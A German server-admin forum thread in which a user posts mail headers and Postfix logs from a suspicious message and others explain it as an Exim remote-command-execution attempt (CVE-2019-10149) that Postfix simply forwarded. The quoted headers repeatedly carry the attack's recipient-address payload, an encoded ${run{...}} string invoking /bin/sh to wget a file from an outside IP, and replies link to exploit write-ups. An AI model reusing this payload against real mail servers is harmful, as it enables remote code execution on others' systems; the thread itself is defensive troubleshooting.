• This forum has a zero tolerance policy regarding spam. If you register here to publish advertising, your user account will be deleted without further questions.

Bitte um Hilfe

sbr2d2

Registered User
Hallo zusammen,
ich habe die vergangenen Tage eine Mail vom Produktivserver bekommen, bzw war die Absenderadresse eine nicht bekannte Mailadresse vom Server.
Jetzt könnte ich etwas Hilfe gebrauchen beim Übersetzen was da passiert ist und ob ich Maßnahmen zu ergreifen habe um schlimmeres zu verhindern.
Hier mal der Quelltext von der Mail die an mein GMX-Fach gegangen ist.
Code:
Return-Path: <root@c3d.com>
Received: from unser Server.de ([Ip dazu]) by mx-ha.gmx.net (mxgmx115 [212.227.17.5]) with ESMTPS (Nemesis) id 1MOB3B-1hvPe03iNl-00OZ8x for <Mein GMX@gmx.de>; Tue, 25 Jun 2019 18:53:25 +0200
Received: by unser Server.de (Postfix) id BDC5620297; Tue, 25 Jun 2019 18:53:25 +0200 (CEST)
Delivered-To: root+${run{x2fbinx2fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@unser Server.de
Received: from localhost (localhost.localdomain [127.0.0.1]) by unser Server.de (Postfix) with ESMTP id BA0B0205F9 for <root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@unser Server.de>; Tue, 25 Jun 2019 18:53:25 +0200 (CEST)
X-Virus-Scanned: Debian amavisd-new at unser Server.de
X-Amavis-Alert: BAD HEADER SECTION, Missing required header field: "Date"
X-Spam-Flag: YES
X-Spam-Score: 9.849
X-Spam-Level: *********
X-Spam-Status: Yes, score=9.849 tagged_above=1 required=5 tests=[EMPTY_MESSAGE=2.344, MISSING_DATE=1.396, MISSING_FROM=1, MISSING_HEADERS=1.207, MISSING_MID=0.14, MISSING_SUBJECT=1.767, PYZOR_CHECK=1.985, T_SPF_HELO_TEMPERROR=0.01] autolearn=no autolearn_force=no
Subject: ***SPAM***
Received: from unser Server.de ([127.0.0.1]) by localhost (unser Server.de [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id kWWjMgFVW1Dj for <root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@unser Server.de>; Tue, 25 Jun 2019 18:53:17 +0200 (CEST)
Received-SPF: None (mailfrom) identity=mailfrom; client-ip=138.68.7.199; helo=c3d.com; envelope-from=root@c3d.com; receiver=<UNKNOWN>
Received: from c3d.com (us-east1b.itmerri.com [138.68.7.199]) by unser Server.de (Postfix) with SMTP id 666FE20297 for <root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@unser Server.de>; Tue, 25 Jun 2019 18:53:17 +0200 (CEST)

Und hier der Logfileauszug zu dem Zeitpunkt
Code:
Jun 25 18:53:16 hostname postfix/smtpd[6527]: connect from us-east1b.itmerri.com[138.68.7.199]
Jun 25 18:53:17 hostname policyd-spf[6573]: prepend Received-SPF: None (mailfrom) identity=mailfrom; client-ip=138.68.7.199; helo=c3d.com; envelope-from=root@c3d.com; receiver=<UNKNOWN>
Jun 25 18:53:17 hostname postfix/smtpd[6527]: 666FE20297: client=us-east1b.itmerri.com[138.68.7.199]
Jun 25 18:53:17 hostname postfix/cleanup[6574]: 666FE20297: message-id=<>
Jun 25 18:53:17 hostname opendkim[2073]: 666FE20297: can't determine message sender; accepting
Jun 25 18:53:17 hostname postfix/qmgr[3461]: 666FE20297: from=<root@c3d.com>, size=953, nrcpt=1 (queue active)
Jun 25 18:53:17 hostname postfix/smtpd[6527]: disconnect from us-east1b.itmerri.com[138.68.7.199] helo=1 mail=1 rcpt=1 data=1 quit=1 commands=5
Jun 25 18:53:25 hostname amavis[3598]: (03598-12) INFO: no existing header field 'Subject', inserting it
Jun 25 18:53:25 hostname postfix/smtpd[6581]: connect from localhost.localdomain[127.0.0.1]
Jun 25 18:53:25 hostname postfix/smtpd[6581]: BA0B0205F9: client=localhost.localdomain[127.0.0.1]
Jun 25 18:53:25 hostname postfix/cleanup[6574]: BA0B0205F9: message-id=<20190625165325.BA0B0205F9@server.name.de>
Jun 25 18:53:25 hostname postfix/smtpd[6581]: disconnect from localhost.localdomain[127.0.0.1] ehlo=1 mail=1 rcpt=1 data=1 quit=1 commands=5
Jun 25 18:53:25 hostname postfix/qmgr[3461]: BA0B0205F9: from=<root@c3d.com>, size=2103, nrcpt=1 (queue active)
Jun 25 18:53:25 hostname amavis[3598]: (03598-12) Passed SPAMMY {RelayedTaggedInbound}, [138.68.7.199]:34504 [138.68.7.199] <root@c3d.com> -> <root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@server.name.de>, Queue-ID: 666FE20297, mail_id: kWWjMgFVW1Dj, Hits: 9.849, size: 903, queued_as: BA0B0205F9, 7986 ms
Jun 25 18:53:25 hostname postfix/smtp[6575]: 666FE20297: to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@server.name.de>, relay=127.0.0.1[127.0.0.1]:10024, delay=8.6, delays=0.57/0.01/0/8, dsn=2.0.0, status=sent (250 2.0.0 from MTA(smtp:[127.0.0.1]:10025): 250 2.0.0 Ok: queued as BA0B0205F9)
Jun 25 18:53:25 hostname postfix/qmgr[3461]: 666FE20297: removed
Jun 25 18:53:25 hostname postfix/cleanup[6574]: BDC5620297: message-id=<20190625165325.BA0B0205F9@server.name.de>
Jun 25 18:53:25 hostname postfix/qmgr[3461]: BDC5620297: from=<root@c3d.com>, size=2300, nrcpt=1 (queue active)
Jun 25 18:53:25 hostname postfix/local[6582]: BA0B0205F9: to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@server.name.de>, relay=local, delay=0.02, delays=0/0.01/0/0, dsn=2.0.0, status=sent (forwarded as BDC5620297)
Jun 25 18:53:25 hostname postfix/qmgr[3461]: BA0B0205F9: removed
Jun 25 18:53:25 hostname postfix/smtp[6583]: BDC5620297: to=<Mein GMX@gmx.de>, orig_to=<root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@server.name.de>, relay=mx01.emig.gmx.net[212.227.17.5]:25, delay=0.12, delays=0/0.01/0.05/0.06, dsn=2.0.0, status=sent (250 Requested mail action okay, completed: id=1N48d7-1ifn1A3bI9-0107sF)
Jun 25 18:53:25 hostname postfix/qmgr[3461]: BDC5620297: removed

Was mich etwas stutzig macht, warum wurde an mein GMX Fach eine Mail geschickt vom Server. Es sind keine Catchall-fächer angelegt und ein paar Fächer haben Weiterleitungen auf mein GMX Fach. Aber von diesen Fächern ist die Mail nicht raus gegangen. Diese Adresse verwirrt auch etwas, schon dadurch das da ein wget mit drin ist >> root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@server.name.de
Die Domain c3d.com hat auch nichts mit unserem Server zu tun, wieso sendet der Produktivserver also unter der Domain eine Mail an mein GMX-Fach?

Bin da grad etwas ratlos was passiert ist. Dem Log glaube ich zu entnehmen, das der Server am Ende alles geblockt hat.
Ich bedanke mich schon mal fürs drüber schauen und gegebenfalls ein paar Antworten.
System ist ein Ubuntu 18.04 welches recht Zeitnah aktuallisiert wird, bzw werden Updates erst hier auf dem Heimserver, dann auf dem Testserver und danach auf dem Produktivserver gemacht.
Gruß S.B.
 
Diese Adresse verwirrt auch etwas, schon dadurch das da ein wget mit drin ist >> root+${run{x2Fbinx2Fsht-ctx22wgetx2065.181.120.163x2fstfinracux22}}@server.name.de
Das ist ein Versuch in einen Exim-Mailserver einzudringen.
https://packetstormsecurity.com/files/153218/Exim-4.9.1-Remote-Command-Execution.htmlhttps://github.com/dhn/exploits/tree/master/CVE-2019-10149https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txthttps://www.heise.de/security/meldu...hrdet-Hunderttausende-Mailserver-4440932.html
Da du aber Postfix nutzt, kann dir das wuscht sein.
 
Last edited:
Vermutich hast du die Zeile
Code:
recipient_delimiter = +
in deiner Postfix-Config drin. Damit verwendet Postfix nur den Teil vor dem Plus Zeichen für das Postfach - die Mail ging also an root@server-name.de und dafür wirst du vermutlich eine Weiterleitung auf ein GMX-Postfach haben. Was diesen Buchstabensalat nach dem Plus betrifft, hat GwenDragon ja schon alles wichtige gesagt. Dein Mailserver hat sich also völlig korrekt verhalten, indem er die Mail weitergeleitet hat.
 
Vielen Dank für die Erklärungen. Mich hatte halt das wget stutzig gemacht. Konnte auf dem Server auch nichts weiter finden zu der Zeile. Zum anderen das der Server Mails für c3d.com versendet.
 
Der Server versendet keine Mails für c3d.com, sondern dein SMTP-Server nimmt Mails von irgendjemand für deine root@domain.tld entgegen und leitet sie wie erwünscht weiter an dein GMX-Konto.
 
Back
Top